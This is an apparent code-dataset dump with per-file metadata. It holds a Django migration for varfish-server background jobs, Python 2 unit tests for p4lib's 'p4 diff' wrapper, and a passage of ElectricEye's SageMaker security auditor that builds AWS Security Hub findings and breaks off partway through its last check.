| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91953a2991b05a6f97af82f07bc8f7f258b195e3
| 5,344
|
py
|
Python
|
variants/migrations/0073_clearexpiredexportedfilesbgjob_clearinactivevariantsetsbgjob_clearoldkioskcasesbgjob_refreshsmallvar.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 14
|
2019-09-30T12:44:17.000Z
|
2022-02-04T14:45:16.000Z
|
variants/migrations/0073_clearexpiredexportedfilesbgjob_clearinactivevariantsetsbgjob_clearoldkioskcasesbgjob_refreshsmallvar.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 244
|
2021-03-26T15:13:15.000Z
|
2022-03-31T15:48:04.000Z
|
variants/migrations/0073_clearexpiredexportedfilesbgjob_clearinactivevariantsetsbgjob_clearoldkioskcasesbgjob_refreshsmallvar.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 8
|
2020-05-19T21:55:13.000Z
|
2022-03-31T07:02:58.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-05-26 17:28
from __future__ import unicode_literals
import bgjobs.models
from django.db import migrations, models
import django.db.models.deletion
import uuid
def _bg_job_create_model(name, related_name):
    """Build the CreateModel operation shared by all four background-job
    models in this migration.

    The four models are identical except for the model name and the
    ``related_name`` of the ``bg_job`` foreign key, so the field layout is
    defined once here instead of four times.
    """
    return migrations.CreateModel(
        name=name,
        fields=[
            (
                "id",
                models.AutoField(
                    auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
                ),
            ),
            (
                "date_created",
                models.DateTimeField(auto_now_add=True, help_text="DateTime of creation"),
            ),
            (
                "sodar_uuid",
                models.UUIDField(default=uuid.uuid4, help_text="Case SODAR UUID", unique=True),
            ),
            (
                "bg_job",
                models.ForeignKey(
                    help_text="Background job for state etc.",
                    on_delete=django.db.models.deletion.CASCADE,
                    related_name=related_name,
                    to="bgjobs.BackgroundJob",
                ),
            ),
        ],
        options={"ordering": ("-date_created",), "abstract": False},
        bases=(bgjobs.models.JobModelMessageMixin, models.Model),
    )


class Migration(migrations.Migration):
    """Add four structurally identical background-job models: clear expired
    exported files, clear inactive variant sets, clear old kiosk cases, and
    refresh small-variant summary."""

    dependencies = [
        ("bgjobs", "0006_auto_20200526_1657"),
        ("variants", "0072_deletecasebgjob"),
    ]
    operations = [
        _bg_job_create_model(
            "ClearExpiredExportedFilesBgJob",
            "variants_clearexpiredexportedfilesbgjob_related",
        ),
        _bg_job_create_model(
            "ClearInactiveVariantSetsBgJob",
            "variants_clearinactivevariantsetsbgjob_related",
        ),
        _bg_job_create_model(
            "ClearOldKioskCasesBgJob",
            "variants_clearoldkioskcasesbgjob_related",
        ),
        _bg_job_create_model(
            "RefreshSmallVariantSummaryBgJob",
            "variants_refreshsmallvariantsummarybgjob_related",
        ),
    ]
| 38.171429
| 99
| 0.458458
| 386
| 5,344
| 6.158031
| 0.222798
| 0.040387
| 0.029449
| 0.046277
| 0.778713
| 0.778713
| 0.778713
| 0.778713
| 0.778713
| 0.778713
| 0
| 0.014108
| 0.442927
| 5,344
| 139
| 100
| 38.446043
| 0.784347
| 0.012912
| 0
| 0.727273
| 1
| 0
| 0.176593
| 0.060129
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037879
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91b97fe149745dd2213b13cc90d98fdee631f290
| 12,086
|
py
|
Python
|
test/test_p4lib_diff.py
|
Tech-pandit/python-p4lib
|
6b5602321c3c79151a1e603c4ef7eac4a405fb68
|
[
"MIT"
] | null | null | null |
test/test_p4lib_diff.py
|
Tech-pandit/python-p4lib
|
6b5602321c3c79151a1e603c4ef7eac4a405fb68
|
[
"MIT"
] | null | null | null |
test/test_p4lib_diff.py
|
Tech-pandit/python-p4lib
|
6b5602321c3c79151a1e603c4ef7eac4a405fb68
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2002-2005 ActiveState Corp.
# See LICENSE.txt for license details.
# Author:
# Trent Mick (TrentM@ActiveState.com)
# Home:
# http://trentm.com/projects/px/
"""Test p4lib.py's interface to 'p4 diff'."""
import os
import sys
import types
import unittest
import pprint
import testsupport
from p4lib import P4, P4LibError
class DiffTestCase(unittest.TestCase):
def test_diff_formats(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_formats.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_formats')
# Open it and make an edit to be able to diff.
p4.edit(fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
results = p4.diff(fname)
result = results[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
result = p4.diff(fname, diffFormat='')[0]
self.failUnless(result['text'].find('> another line') != -1)
result = p4.diff(fname, diffFormat='n')[0]
self.failUnless(result['text'].find('a10 1') != -1)
self.failUnless(result['text'].find('another line') != -1)
result = p4.diff(fname, diffFormat='c')[0]
self.failUnless(result['text'].find('*'*15) != -1)
self.failUnless(result['text'].find('+ another line') != -1)
result = p4.diff(fname, diffFormat='s')[0]
self.failUnless(result['text'].find('add 1 chunks 1 lines') != -1)
result = p4.diff(fname, diffFormat='u')[0]
self.failUnless(result['text'].find('+another line') != -1)
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_no_changes(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_no_changes.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_no_changes')
# Open it and make NO edits.
p4.edit(fname)
results = p4.diff(fname)
result = results[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failIf(result.has_key('text'))
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_satisfying_a(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_a.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_a')
# Open it and make NO edits.
p4.edit(fname)
results = p4.diff(fname, satisfying='a')
self.failIf(results)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
result = p4.diff(fname, satisfying='a')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_satisfying_d(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_d.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_d')
results = p4.diff(fname, satisfying='d')
self.failIf(results)
os.chmod(fname, 0777)
os.remove(fname)
result = p4.diff(fname, satisfying='d')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
finally:
os.chdir(top)
def test_diff_satisfying_e(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_e.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_e')
results = p4.diff(fname, satisfying='e')
self.failIf(results)
# Make an edit but do NOT open it for edit.
os.chmod(fname, 0777)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
result = p4.diff(fname, satisfying='e')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
finally:
os.chdir(top)
def test_diff_satisfying_r(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_r.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_r')
results = p4.diff(fname, satisfying='r')
self.failIf(results)
# Open it and make NO edits.
p4.edit(fname)
result = p4.diff(fname, satisfying='r')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
results = p4.diff(fname, satisfying='r')
self.failIf(results)
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_force(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_force.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_force')
# Make an edit but do NOT open it for edit.
os.chmod(fname, 0777)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
results = p4.diff(fname)
self.failIf(results)
results = p4.diff(fname, force=1)
result = results[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
finally:
os.chdir(top)
def test_diff_binary(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file (make it binary).
fname = 'test_diff_binary.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname, filetype='binary')
p4.submit(fname, 'for test_diff_binary')
# Open for edit and make a change.
p4.edit(fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
result = p4.diff(fname)[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(type(result['notes']) == types.ListType)
self.failIf(result.has_key('text'))
result = p4.diff(fname, text=1)[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
self.failIf(result.has_key('notes'))
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_bogus_args(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_bogus_args.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_bogus_args')
# Open for edit and make a change.
p4.edit(fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
self.failUnlessRaises(P4LibError, p4.diff, fname, diffFormat='q')
self.failUnlessRaises(P4LibError, p4.diff, fname, satisfying='q')
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_multiple_files(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname1 = 'test_diff_multiple_files_1.txt'
fname2 = 'test_diff_multiple_files_2.txt'
fnames = [fname1, fname2]
for fname in fnames:
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add([fname1, fname2])
p4.submit([fname1, fname2], 'for test_diff_multiple_files')
# Open for edit and make a change.
p4.edit(fnames)
for fname in fnames:
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
results = p4.diff(fnames)
self.failUnless(len(results) == 2)
for result in results:
self.failUnless(os.path.basename(result['depotFile']) in fnames)
self.failUnless(os.path.basename(result['localFile']) in fnames)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
# cleanup
p4.revert(fnames)
finally:
os.chdir(top)
def suite():
    """Return a unittest.TestSuite to be used by test.py."""
    loader = unittest.defaultTestLoader
    return loader.loadTestsFromTestCase(DiffTestCase)
| 33.949438
| 80
| 0.525732
| 1,431
| 12,086
| 4.373864
| 0.098532
| 0.078287
| 0.038664
| 0.051126
| 0.835757
| 0.817383
| 0.764978
| 0.741652
| 0.741652
| 0.704745
| 0
| 0.021253
| 0.342049
| 12,086
| 355
| 81
| 34.04507
| 0.765845
| 0.079927
| 0
| 0.719101
| 0
| 0
| 0.110332
| 0.031406
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.026217
| null | null | 0.003745
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
91bdf2112ce580e0a05bb8a459808af05b8fad5f
| 30,958
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_SageMaker_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_SageMaker_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_SageMaker_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import datetime
import boto3
from check_register import CheckRegister
# Shared registry; the @registry.register_check decorators below hook each
# auditor function into it.
registry = CheckRegister()
# import boto3 clients
# Module-level SageMaker client reused by every check in this auditor.
sagemaker = boto3.client("sagemaker")
@registry.register_check("sagemaker")
def sagemaker_notebook_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[SageMaker.1] SageMaker notebook instance storage volumes should be encrypted"""
    # loop through sagemaker notebooks
    response = sagemaker.list_notebook_instances()
    mySageMakerNotebooks = response["NotebookInstances"]
    for notebooks in mySageMakerNotebooks:
        notebookName = str(notebooks["NotebookInstanceName"])
        response = sagemaker.describe_notebook_instance(NotebookInstanceName=notebookName)
        notebookArn = str(response["NotebookInstanceArn"])
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        # "KmsKeyId" is only present in the response when the storage volume
        # is KMS-encrypted.  Catch KeyError specifically: the previous bare
        # `except:` reported any unrelated failure as an unencrypted finding.
        try:
            str(response["KmsKeyId"])
            isEncrypted = True
        except KeyError:
            isEncrypted = False
        # Only the severity, description and pass/fail state differ between
        # the two outcomes; build them here and emit a single finding below.
        if isEncrypted:
            severityLabel = "INFORMATIONAL"
            description = "SageMaker notebook instance " + notebookName + " is encrypted."
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
        else:
            severityLabel = "HIGH"
            description = (
                "SageMaker notebook instance "
                + notebookName
                + " is not encrypted. Refer to the remediation instructions to remediate this behavior"
            )
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": notebookArn + "/sagemaker-notebook-encryption-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": notebookArn,
            "AwsAccountId": awsAccountId,
            "Types": [
                "Software and Configuration Checks/AWS Security Best Practices",
                "Effects/Data Exposure",
            ],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[SageMaker.1] SageMaker notebook instance storage volumes should be encrypted",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "For more information on SageMaker encryption and how to configure it refer to the Protect Data at Rest Using Encryption section of the Amazon SageMaker Developer Guide",
                    "Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html",
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsSagemakerNotebookInstance",
                    "Id": notebookArn,
                    "Partition": "aws",
                    "Region": awsRegion,
                    "Details": {"Other": {"notebookName": notebookName}},
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.DS-1",
                    "NIST SP 800-53 MP-8",
                    "NIST SP 800-53 SC-12",
                    "NIST SP 800-53 SC-28",
                    "AICPA TSC CC6.1",
                    "ISO 27001:2013 A.8.2.3",
                ],
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState,
        }
@registry.register_check("sagemaker")
def sagemaker_notebook_direct_internet_access_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[SageMaker.2] SageMaker notebook instances should not have direct internet access configured"""
    # loop through sagemaker notebooks
    response = sagemaker.list_notebook_instances()
    mySageMakerNotebooks = response["NotebookInstances"]
    for notebooks in mySageMakerNotebooks:
        notebookName = str(notebooks["NotebookInstanceName"])
        response = sagemaker.describe_notebook_instance(NotebookInstanceName=notebookName)
        notebookArn = str(response["NotebookInstanceArn"])
        directInternetCheck = str(response["DirectInternetAccess"])
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        # Direct internet access "Enabled" fails the check; the two outcomes
        # differ only in severity, description and pass/fail state.
        if directInternetCheck == "Enabled":
            severityLabel = "HIGH"
            description = (
                "SageMaker notebook instance "
                + notebookName
                + " has direct internet access configured. Refer to the remediation instructions to remediate this behavior"
            )
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
        else:
            severityLabel = "INFORMATIONAL"
            description = (
                "SageMaker notebook instance "
                + notebookName
                + " does not have direct internet access configured."
            )
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": notebookArn + "/sagemaker-notebook-direct-internet-access-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": notebookArn,
            "AwsAccountId": awsAccountId,
            "Types": [
                "Software and Configuration Checks/AWS Security Best Practices",
                "Effects/Data Exposure",
            ],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[SageMaker.2] SageMaker notebook instances should not have direct internet access configured",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "For more information on SageMaker infrastructure protection refer to the Connect a Notebook Instance to Resources in a VPC section of the Amazon SageMaker Developer Guide",
                    "Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/appendix-notebook-and-internet-access.html",
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsSagemakerNotebookInstance",
                    "Id": notebookArn,
                    "Partition": "aws",
                    "Region": awsRegion,
                    "Details": {"Other": {"notebookName": notebookName}},
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.AC-5",
                    "NIST SP 800-53 AC-4",
                    "NIST SP 800-53 AC-10",
                    "NIST SP 800-53 SC-7",
                    "AICPA TSC CC6.1",
                    "ISO 27001:2013 A.13.1.1",
                    "ISO 27001:2013 A.13.1.3",
                    "ISO 27001:2013 A.13.2.1",
                    "ISO 27001:2013 A.14.1.2",
                    "ISO 27001:2013 A.14.1.3",
                ],
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState,
        }
@registry.register_check("sagemaker")
def sagemaker_notebook_in_vpc_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[SageMaker.3] SageMaker notebook instances should be placed in a VPC"""
    # loop through sagemaker notebooks
    response = sagemaker.list_notebook_instances()
    mySageMakerNotebooks = response["NotebookInstances"]
    for notebooks in mySageMakerNotebooks:
        notebookName = str(notebooks["NotebookInstanceName"])
        response = sagemaker.describe_notebook_instance(NotebookInstanceName=notebookName)
        notebookArn = str(response["NotebookInstanceArn"])
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        # "SubnetId" is only present when the notebook is attached to a VPC.
        # BUG FIX: the previous version had the branches inverted -- a present
        # SubnetId (i.e. the notebook IS in a VPC) produced the FAILED
        # "is not in a VPC" finding and vice versa.  Also narrowed the bare
        # `except:` to KeyError so unrelated errors are not misreported.
        try:
            str(response["SubnetId"])
            inVpc = True
        except KeyError:
            inVpc = False
        if inVpc:
            severityLabel = "INFORMATIONAL"
            description = "SageMaker notebook instance " + notebookName + " is in a VPC."
            complianceStatus = "PASSED"
            workflowStatus = "RESOLVED"
            recordState = "ARCHIVED"
        else:
            severityLabel = "MEDIUM"
            description = (
                "SageMaker notebook instance "
                + notebookName
                + " is not in a VPC. Refer to the remediation instructions to remediate this behavior"
            )
            complianceStatus = "FAILED"
            workflowStatus = "NEW"
            recordState = "ACTIVE"
        yield {
            "SchemaVersion": "2018-10-08",
            "Id": notebookArn + "/sagemaker-notebook-in-vpc-check",
            "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
            "GeneratorId": notebookArn,
            "AwsAccountId": awsAccountId,
            "Types": [
                "Software and Configuration Checks/AWS Security Best Practices",
                "Effects/Data Exposure",
            ],
            "FirstObservedAt": iso8601Time,
            "CreatedAt": iso8601Time,
            "UpdatedAt": iso8601Time,
            "Severity": {"Label": severityLabel},
            "Confidence": 99,
            "Title": "[SageMaker.3] SageMaker notebook instances should be placed in a VPC",
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": "For more information on SageMaker infrastructure protection refer to the Connect a Notebook Instance to Resources in a VPC section of the Amazon SageMaker Developer Guide",
                    "Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/appendix-notebook-and-internet-access.html",
                }
            },
            "ProductFields": {"Product Name": "ElectricEye"},
            "Resources": [
                {
                    "Type": "AwsSagemakerNotebookInstance",
                    "Id": notebookArn,
                    "Partition": "aws",
                    "Region": awsRegion,
                    "Details": {"Other": {"notebookName": notebookName}},
                }
            ],
            "Compliance": {
                "Status": complianceStatus,
                "RelatedRequirements": [
                    "NIST CSF PR.AC-5",
                    "NIST SP 800-53 AC-4",
                    "NIST SP 800-53 AC-10",
                    "NIST SP 800-53 SC-7",
                    "AICPA TSC CC6.1",
                    "ISO 27001:2013 A.13.1.1",
                    "ISO 27001:2013 A.13.1.3",
                    "ISO 27001:2013 A.13.2.1",
                    "ISO 27001:2013 A.14.1.2",
                    "ISO 27001:2013 A.14.1.3",
                ],
            },
            "Workflow": {"Status": workflowStatus},
            "RecordState": recordState,
        }
@registry.register_check("sagemaker")
def sagemaker_endpoint_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[SageMaker.4] SageMaker endpoints should be encrypted

    Yields one ASFF finding per SageMaker endpoint: PASSED when the endpoint's
    data capture configuration specifies a KMS key, FAILED otherwise.
    """
    # loop through sagemaker endpoints
    response = sagemaker.list_endpoints()
    mySageMakerEndpoints = response["Endpoints"]
    for endpoints in mySageMakerEndpoints:
        endpointName = str(endpoints["EndpointName"])
        response = sagemaker.describe_endpoint(EndpointName=endpointName)
        endpointArn = str(response["EndpointArn"])
        # timestamp shared by all date fields of this finding
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        try:
            # Raises KeyError when data capture is not configured or has no CMK.
            # BUG FIX: was a bare `except:` (which also swallowed unrelated
            # errors such as throttling exceptions) plus a leftover debug print
            # of the key id; now only the expected missing-key case is handled.
            dataCaptureEncryptionCheck = str(response["DataCaptureConfig"]["KmsKeyId"])
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": endpointArn + "/sagemaker-endpoint-encryption-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": endpointArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "INFORMATIONAL"},
                "Confidence": 99,
                "Title": "[SageMaker.4] SageMaker endpoints should be encrypted",
                "Description": "SageMaker endpoint " + endpointName + " is encrypted.",
                "Remediation": {
                    "Recommendation": {
                        "Text": "For more information on SageMaker encryption and how to configure it refer to the Protect Data at Rest Using Encryption section of the Amazon SageMaker Developer Guide",
                        "Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsSagemakerEndpoint",
                        "Id": endpointArn,
                        "Partition": "aws",
                        "Region": awsRegion,
                        "Details": {"Other": {"endpointName": endpointName}},
                    }
                ],
                "Compliance": {
                    "Status": "PASSED",
                    "RelatedRequirements": [
                        "NIST CSF PR.DS-1",
                        "NIST SP 800-53 MP-8",
                        "NIST SP 800-53 SC-12",
                        "NIST SP 800-53 SC-28",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.8.2.3",
                    ],
                },
                "Workflow": {"Status": "RESOLVED"},
                "RecordState": "ARCHIVED",
            }
            yield finding
        except KeyError:
            # No KMS key configured for data capture -> failing finding
            finding = {
                "SchemaVersion": "2018-10-08",
                "Id": endpointArn + "/sagemaker-endpoint-encryption-check",
                "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                "GeneratorId": endpointArn,
                "AwsAccountId": awsAccountId,
                "Types": [
                    "Software and Configuration Checks/AWS Security Best Practices",
                    "Effects/Data Exposure",
                ],
                "FirstObservedAt": iso8601Time,
                "CreatedAt": iso8601Time,
                "UpdatedAt": iso8601Time,
                "Severity": {"Label": "HIGH"},
                "Confidence": 99,
                "Title": "[SageMaker.4] SageMaker endpoints should be encrypted",
                "Description": "SageMaker endpoint "
                + endpointName
                + " is not encrypted. Refer to the remediation instructions to remediate this behavior",
                "Remediation": {
                    "Recommendation": {
                        "Text": "For more information on SageMaker encryption and how to configure it refer to the Protect Data at Rest Using Encryption section of the Amazon SageMaker Developer Guide",
                        "Url": "https://docs.aws.amazon.com/sagemaker/latest/dg/encryption-at-rest.html",
                    }
                },
                "ProductFields": {"Product Name": "ElectricEye"},
                "Resources": [
                    {
                        "Type": "AwsSagemakerEndpoint",
                        "Id": endpointArn,
                        "Partition": "aws",
                        "Region": awsRegion,
                        "Details": {"Other": {"endpointName": endpointName}},
                    }
                ],
                "Compliance": {
                    "Status": "FAILED",
                    "RelatedRequirements": [
                        "NIST CSF PR.DS-1",
                        "NIST SP 800-53 MP-8",
                        "NIST SP 800-53 SC-12",
                        "NIST SP 800-53 SC-28",
                        "AICPA TSC CC6.1",
                        "ISO 27001:2013 A.8.2.3",
                    ],
                },
                "Workflow": {"Status": "NEW"},
                "RecordState": "ACTIVE",
            }
            yield finding
@registry.register_check("sagemaker")
def sagemaker_model_network_isolation_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[SageMaker.5] SageMaker models should have network isolation enabled

    Yields one ASFF finding per SageMaker model: FAILED when
    EnableNetworkIsolation is false, PASSED otherwise.
    """
    # loop through sagemaker models
    response = sagemaker.list_models()
    mySageMakerModels = response["Models"]
    for models in mySageMakerModels:
        modelName = str(models["ModelName"])
        modelArn = str(models["ModelArn"])
        response = sagemaker.describe_model(ModelName=modelName)
        # BUG FIX (idiom): EnableNetworkIsolation is a boolean; compare it
        # directly instead of stringifying it and comparing against "False"
        networkIsolationCheck = response["EnableNetworkIsolation"]
        # timestamp shared by all date fields of this finding
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
